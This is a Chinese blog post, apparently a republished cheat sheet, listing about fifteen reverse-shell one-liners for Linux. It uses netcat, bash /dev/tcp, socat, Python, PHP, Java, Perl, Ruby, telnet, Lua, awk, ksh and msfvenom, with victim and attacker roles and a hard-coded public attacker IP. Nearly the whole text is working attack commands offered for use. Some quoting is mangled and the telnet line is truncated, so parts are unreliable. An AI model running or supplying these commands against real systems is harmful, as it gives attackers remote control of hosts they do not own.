美文网首页
反弹shell的N种方式

反弹shell的N种方式

作者: 萨满原子 | 来源:发表于2019-07-10 21:08 被阅读0次

    linux反弹shell总结(15种方法)

    1.1发送文件(公网发内网)

    文件发送端:nc -lp 6666 < 文件

    文件接收端:nc 发送端ip 发送端端口 > 新文件

    1.2发送文件(内网发公网)

    文件发送端:nc -lp 6666 > 文件

    文件接收端:nc 发送端ip 发送端端口 < 新文件

    2.聊天

    发送端:nc -lp 6666

    接收端:nc 发送端ip 发送端端口

    3.1发送shell

    发送端(公网服务器):nc -lvvp 6666 -e /bin/bash

    接收端:nc 发送端ip 发送端端口

    3.2反弹shell

    接收端:nc -lvvp 6666

    发送端(内网网服务器):nc 接收端ip 接收端端口 -e /bin/bash

    4.bash反弹

    接收端(hackip,公网):nc -lvvp 端口

    发送端(受害者):bash -i >& /dev/tcp/hackip/hack端口 0>&1

    发送端(受害者):0<&31-;exec 31<>/dev/tcp/hackip/hack端口;sh <&31 >&31 2>&31

    5.1socat反弹(tcp)

    接收端(攻击机):./socat TCP-LISTEN:端口 –

    发送端(靶机):./socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:攻击机ip:攻击机端口

    5.2socat反弹(udp)

    接收端:nc -lvvp 8080

    发送端:socat udp-connect:111.230.170.95:8080 exec:’bash -li’,pty,stderr,sane 2>&1>/dev/null &

    6.python反弹

    接收端(攻击机,外网):nc -lvvp 端口

    发送端(靶机):python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“接收端ip”,接收端端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

    7.PHP反弹

    接收端:nc -lvvp 端口

    发送端:php -r ‘$sock=fsockopen(“接收端ip”,接收端端口);exec(“/bin/sh -i <&3 >&3 2>&3”);’

    8.JAVA反弹

    接收端:nc -lvvp 端口

    发送端:

    r = Runtime.getRuntime()

    p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.31.41/8080;cat <&5 | while read line; do $line 2>&5 >&5; done”] as String[])

    p.waitFor()

    9.perl反弹

    接收端:nc -lvvp 端口

    发送端:

    perl -e ‘use Socket;$i=”111.230.170.95″;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

    10.ruby反弹

    接收端:nc -lvvp 端口

    发送端:

    ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“111.230.170.95″,”8888″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

    11.telnet反弹

    接收端:nc -lvvp 端口

    发送端:

    mknod backpipe p && telnet 111.230.170.95 8080 0backpipe

    12.lua反弹(安装lua环境:apt-get install lua*)

    接收端:nc -lvvp 端口

    发送端:lua -e “local s=require(‘socket’);local t=assert(s.tcp());t:connect(‘111.230.170.95′,8080);while true do local r,x=t:receive();local f=assert(io.popen(r,’r’));local b=assert(f:read(‘*a’));t:send(b);end;f:close();t:close();”

    13.awk反弹

    接收端:nc -lvvp 端口

    发送端:awk ‘BEGIN{s=”/inet/tcp/0/111.230.170.95/8080″;while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!=”exit”);close(s)}}’

    14.ksh反弹

    接收端:nc -lvvp 端口

    发送端:ksh -c ‘ksh >/dev/tcp/111.230.170.95/8080 2>&1 <&1’

    15.msfvenom生成各种payload

    接收端:nc -lvvp 端口

    查找payload:msfvenom -l payload |grep ‘cmd/unix/reverse’

    生成payload:msfvenom -p cmd/unix/reverse_模块 lhost=接收端ip lport=接收端端口 R

    相关文章

      网友评论

          本文标题:反弹shell的N种方式

          本文链接:https://www.haomeiwen.com/subject/rfikkctx.html